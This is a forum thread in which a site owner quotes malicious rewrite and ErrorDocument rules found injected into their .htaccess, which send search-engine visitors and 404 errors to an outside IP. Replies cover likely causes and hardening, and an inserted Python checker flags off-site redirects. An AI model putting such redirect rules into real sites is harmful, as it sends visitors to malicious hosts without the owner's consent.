.htaccess Edited... but not by me!

Chalks
Forum Contributor
Posts: 447
Joined: Thu Jul 12, 2007 7:55 am
Location: Indiana

.htaccess Edited... but not by me!

Post by Chalks »

Ok guys, I'd love to hear thoughts on this one. I had a very strange thing happen to me today. I found out that my .htaccess file had been edited by _someone_ to have this in it:


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err

I'm not entirely sure what all of that means. However, I now know that all my 404s were getting redirected to 87.248.180.88 (which seems to be spam/virus-ey). I discovered this by almost pure chance. I've alerted my hosting provider, have changed all my passwords, and removed all the code that I could find. However, I'm _very_ curious as to how this got into my .htaccess file.

I would be _very_ surprised if someone had guessed my password since it's rather strong (8+ characters, capitalization thrown in and numbers/special chars).
I'm pretty sure that none of the php scripts on my server have access to this file, but I could be wrong (?).
Any ideas?
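As an added example (not code from this thread or from anyone in it), a small Python checker for the injection pattern quoted above: it parses the RewriteCond/RewriteRule/ErrorDocument lines, evaluates the referrer chain the way mod_rewrite does (which is why the owner only noticed it by chance: direct visits never trigger the redirect, only visitors arriving from a search engine do), and flags any redirect or error-document target on a host the site does not own. The sample .htaccess is constructed inline from the post, and the allowlist of "own" hosts is an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed sample input: the injected .htaccess quoted in the post above.
INJECTED = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
"""

COND_RE = re.compile(r'^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)
RULE_RE = re.compile(r'^RewriteRule\s+\S+\s+(\S+)', re.I)
ERRDOC_RE = re.compile(r'^ErrorDocument\s+(\d{3})\s+(\S+)', re.I)

def parse_htaccess(text):
    """(directive, conds, target) triples; RewriteConds accumulate until a RewriteRule uses them."""
    entries, pending = [], []
    for line in (l.strip() for l in text.splitlines()):
        if m := COND_RE.match(line):
            flags = {f.strip().upper() for f in (m.group(2) or '').split(',')}
            pending.append((m.group(1), flags))
        elif m := RULE_RE.match(line):
            entries.append(('RewriteRule', pending, m.group(1)))
            pending = []
        elif m := ERRDOC_RE.match(line):
            entries.append(('ErrorDocument ' + m.group(1), [], m.group(2)))
    return entries

def referer_triggers(conds, referer):
    """Apache semantics: conds are ANDed, except [OR] joins a cond with the next; [NC] = ignore case."""
    groups, group = [], []
    for pattern, flags in conds:
        group.append((pattern, re.I if 'NC' in flags else 0))
        if 'OR' not in flags:
            groups, group = groups + [group], []
    groups += [group] if group else []   # trailing [OR] with no further cond
    return all(any(re.search(p, referer or '', f) for p, f in g) for g in groups)

def offsite_redirects(text, own_hosts):
    """Flag any RewriteRule/ErrorDocument whose target is an absolute URL on a host
    outside own_hosts (assumed allowlist); a site rarely sends its 404s elsewhere."""
    return [(d, urlparse(t).hostname, [p for p, _ in c]) for d, c, t in parse_htaccess(text)
            if urlparse(t).hostname and urlparse(t).hostname not in own_hosts]
```

Note that `.*ask.*$` is a substring match, so any referrer containing "ask" would also trigger the redirect; the attacker cast a deliberately wide net.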
psychotomus
Forum Contributor
Posts: 487
Joined: Fri Jul 11, 2003 1:59 am

Re: .htaccess Edited... but not by me!

Post by psychotomus »

If any of your forms allow uploading, you need to check that they can only upload certain file types. I forgot to do this on one of my sites, and someone uploaded a .js file and erased over 200GB of data from my server. It took about 2 weeks to reupload it all.
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Re: .htaccess Edited... but not by me!

Post by Chris Corbyn »

Are you on a shared host? It's possible that all users run PHP under the same userid, which is a big security risk.
volomike
Forum Regular
Posts: 633
Joined: Wed Jan 16, 2008 9:04 am
Location: Myrtle Beach, South Carolina, USA

Re: .htaccess Edited... but not by me!

Post by volomike »

Check to see if something you did in your shared hosting control panel (if you used shared hosting) did this to you. If not, then you need to go to your web hosting provider to ask if they have an answer. If they don't have an answer, then yeah, you might have been hacked. They don't need to know your password -- there are exploits in certain packages and certain versions of Apache 1.5 and 2. You have to ensure your stuff is patched and up to date. Usually that's the job of your web hosting provider. So, for instance, if I were hacked on a shared host, I'd ensure I had good backups, find the one that worked, complain to my web hosting provider to keep the systems secure, and once everything was good again, I'd reupload my stuff from backup.

If it's mission critical, some people go this route. They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly. In the meantime, the site owner (you) would then split up all the sites s/he owns across these two web hosts. When one starts to have trouble, they can move some or all the domains to the other.
VladSun
DevNet Master
Posts: 4313
Joined: Wed Jun 27, 2007 9:44 am
Location: Sofia, Bulgaria

Re: .htaccess Edited... but not by me!

Post by VladSun »

volomike wrote: They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly.
It's true only if the TTL for DNS records is set to a very low value (e.g. 1 hour), which is rarely seen with DNS registrars.
The TTL is usually set to 86400, i.e. 1 day.

Also, most of the sites use a DB server - it should be synchronized with the "new" one.
There are 10 types of people in this world, those who understand binary and those who don't
panic!
Forum Regular
Posts: 516
Joined: Mon Jul 31, 2006 7:59 am
Location: Brighton, UK

Re: .htaccess Edited... but not by me!

Post by panic! »

manialix wrote: Yes, 100% agreed with Chris Corbyn. It's a big security risk.
I like how you signed up just to agree with someone haha. :)